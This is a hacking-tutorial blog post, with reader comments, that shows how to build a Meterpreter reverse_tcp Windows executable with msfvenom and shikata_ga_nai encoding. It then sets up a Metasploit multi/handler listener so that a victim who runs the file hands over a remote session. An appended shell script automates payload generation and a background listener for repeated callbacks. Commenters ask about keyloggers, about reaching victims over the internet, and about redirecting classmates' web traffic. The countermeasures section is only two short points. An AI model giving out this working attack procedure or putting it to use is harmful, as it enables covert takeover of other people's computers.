Create Exploit Using Msfvenom to Hack Windows 7 SP1


Type : Tutorial

Level : Medium

Attacker O.S : Backtrack 5 R2

Victim O.S : Windows 7 SP1

After the last tutorial about generating shellcode with msfpayload, today we will learn to use another Metasploit Framework command-line tool called msfvenom.

In this tutorial on creating an exploit with msfvenom to hack Windows 7 SP1, we will build a Meterpreter executable with msfvenom, run it on the victim, and then catch the connection that the victim's computer makes back to us.

Here is the explanation of msfvenom from offensive-security.com:

msfvenom is a combination of Msfpayload and msfencode, putting both of these tools into a single framework instance. The advantages of msfvenom are:

  • One single tool
  • Standardized command line options
  • Increased speed

Requirements :

1. Metasploit framework

Step by Step :

1. Open your terminal (CTRL + ALT + T) and type msfvenom -h to view the available options for this tool.

The help output explains the usage of msfvenom.

2. In this tutorial I want to create an executable with msfvenom that carries the Meterpreter payload, encoded with the shikata_ga_nai encoder. To see the options the chosen payload needs, add -o (--options) after selecting the payload with -p. On current Metasploit releases that flag is --list-options instead, and -o now names the output file.

3. There it is: we need to set LHOST and LPORT for this payload to work. My IP address is 192.168.8.91, so I set LHOST to that IP, and I set LPORT to 443 so that I receive the connection from the victim on port 443 if the exploit succeeds.

Information :

-p windows/meterpreter/reverse_tcp --> the payload: a staged Meterpreter that connects back from the victim to us over TCP

-e x86/shikata_ga_nai --> the encoder I use for this tutorial

-i 5 --> run the encoder 5 times (iterations)

-b '\x00' --> treat the null byte as a bad character and keep it out of the encoded payload

I write the generated executable to the Desktop folder and name it abc.exe.

4. The executable generated in step 3 will be sent to the victim later. The next step is to set up a listener on the attacker computer using the multi/handler module.

5. Start the Metasploit console by running msfconsole in your terminal.

6. As I said above, I want to use the Meterpreter reverse_tcp payload, so I need to set it in the handler.

Information :

use exploit/multi/handler --> to handle incoming connection

set payload windows/meterpreter/reverse_tcp --> reverse tcp payload

show options --> show available options to set

7. Next we also need to set LHOST and LPORT in the handler, and they must match the values used in step 3; if they differ, the payload will call back to the wrong address or port and no session will open.

Our handler is ready to receive a connection on port 443.

8. When you send the executable to the victim and the victim runs it, we get a Meterpreter session:

Pwned!
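The whole attacker-side procedure (steps 3 and 5 to 7) as one script, an added example that is not part of the original tutorial. It builds the msfvenom command and a matching msfconsole resource script for the multi/handler from a single LHOST/LPORT pair, so the two cannot disagree, and checks that the port written into the resource script is the one the payload was built with. Assumptions: the tutorial's LHOST 192.168.8.91, LPORT 443 and output name abc.exe as defaults; current msfvenom syntax (-f exe -o FILE; older builds wrote "-f exe > FILE"); the file is saved as gen_payload.sh. msfvenom is only run if it is on PATH, otherwise the command is just printed, so the script also runs offline.

```shell
#!/bin/sh
# Added example, not code from the original tutorial. Generates the msfvenom
# command (step 3) and a multi/handler resource script (steps 5-7) from one
# LHOST/LPORT pair. Defaults below are the tutorial's values (assumptions).

# Reject anything that is not a dotted-quad IPv4 address with octets 0-255.
valid_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    # Split on "." in a subshell so the caller's IFS is left untouched.
    ( IFS=.; set -- $1
      [ "$#" -eq 4 ] || exit 1
      for octet; do [ "$octet" -le 255 ] || exit 1; done )
}

# Accept only a TCP port in 1-65535.
valid_port() {
    case "$1" in
        ''|*[!0-9]*) return 1 ;;
    esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# Print the msfvenom command for step 3: staged Meterpreter reverse TCP,
# encoded five times with shikata_ga_nai, null byte excluded, PE .exe output.
msfvenom_cmd() {
    lhost=$1; lport=$2; out=$3
    valid_ipv4 "$lhost" || { echo "bad LHOST: $lhost" >&2; return 1; }
    valid_port "$lport" || { echo "bad LPORT: $lport" >&2; return 1; }
    printf 'msfvenom -p windows/meterpreter/reverse_tcp LHOST=%s LPORT=%s -e x86/shikata_ga_nai -i 5 -b %s -f exe -o %s\n' \
        "$lhost" "$lport" "'\\x00'" "$out"
}

# Write the multi/handler resource script for steps 5-7. ExitOnSession=false
# plus "exploit -j -z" keeps the handler running in the background so it can
# catch more than one callback instead of stopping after the first session.
handler_rc() {
    lhost=$1; lport=$2; rc=$3
    valid_ipv4 "$lhost" || return 1
    valid_port "$lport" || return 1
    cat > "$rc" <<EOF
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Read the LPORT out of a resource script; this is the "make sure it's the
# same" check of step 7 done by the script instead of by eye.
rc_lport() {
    awk '$1 == "set" && $2 == "LPORT" { print $3 }' "$1"
}

main() {
    lhost=${1:-192.168.8.91}; lport=${2:-443}
    exe=${3:-abc.exe}; rc=${4:-handler.rc}
    cmd=$(msfvenom_cmd "$lhost" "$lport" "$exe") || exit 1
    handler_rc "$lhost" "$lport" "$rc" || exit 1
    [ "$(rc_lport "$rc")" = "$lport" ] || { echo "LPORT mismatch in $rc" >&2; exit 1; }
    echo "$cmd"
    echo "handler resource script written to $rc"
    if command -v msfvenom >/dev/null 2>&1; then
        sh -c "$cmd"
    fi
    echo "start the listener with: msfconsole -q -r $rc"
}

# Run only when executed as gen_payload.sh, not when sourced.
case "${0##*/}" in gen_payload.sh) main "$@" ;; esac
```

Run it as `sh gen_payload.sh 192.168.8.91 443 abc.exe handler.rc`, then start the listener with `msfconsole -q -r handler.rc` before sending abc.exe to the victim. Keeping the handler as a background job (-j -z) is what lets you run several payloads against the same listener without re-typing steps 5 to 7 each time.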

Countermeasures :

1. Always keep your antivirus updated. Encoding with shikata_ga_nai is not a reliable bypass: signature-based antivirus still detects the stock msfvenom executable template, so a current antivirus catches a payload built exactly as above.

2. Install a personal firewall, and make sure it also filters outbound connections. The payload here connects out from the victim to the attacker on port 443, so a firewall that only blocks inbound traffic will let it through.

Hope it's useful 🙂


Blogger at hacking-tutorial.com. Love PHP, offensive security and web. Contact him at me[-at-]vishnuvalentino.com

Visit Website : http://www.vishnuvalentino.com

  • peter

    The issue I'm having with this, though, is that I'm gaining access via the session and have control of the victim's components, but I'm wondering if it's possible to execute a keylogger somehow.

    • v4L

      #peter
      Yes, you can: http://www./tips-and-trick/5-step-to-capture-windows-user-login-using-metasploit-keylogger/

  • mehdi

    Vishnu, I want to use my WAN IP. I did port forwarding, but when I make the exploit I get this:
    Handler failed to bind to (my ip):443
    [*] Started reverse handler on 0.0.0.0:443
    [*] Starting the payload handler…

    • v4L

      #mehdi
      It means that your port 443 hasn't been forwarded yet on your router.

  • sush

    Hey.. I'm using VMware for BT5 R3..
    When I run the file on my PC (in Win 7), the session opens.. but when I gave it to my friend.. he runs it but no session opens???
    Do we have to purchase a static IP or what??
    And one more question: what do we have to type when we have to open the session another day (after 1 day)?
    Answer both questions please.
    Sorry, my 'W' is not working properly; don't mind it. It's when* and Win 7.

    • v4L

      #sush
      You can view here: http://www./hacking-tutorial/how-to-hacking-wan-internet-by-using-public-dynamic-ip-address/
      and here: http://www./hacking-tutorial/how-to-do-hacking-the-internet-wan-not-lan-using-metasploit-the-logic/

  • wizz

    How do I send abc.exe to the victim?? In what form??

  • jayaram

    Hi sir, this is Jayaram.
    I had a doubt; I think you can clear it.

    I am using wifi at college.
    I had a small idea.

    Suppose my user browses facebook.com; it must be redirected to some other site.
    How do I do it in BT5 R3?
    Is there any solution in Backtrack for this problem?

    Please sir, reply to my mail.

    I will wait for your reply with 1000 eyes.

  • Great tutorial, bro…… join my forum, bro: www.indonesianbacktrack.or.id

  • akash thakar

    Hey there,
    I am using Kali Linux 2.0.
    I have done all the things correctly as mentioned above,
    but I could not establish a connection with the victim computer; the meterpreter session could not be opened.
    Can anyone please help me???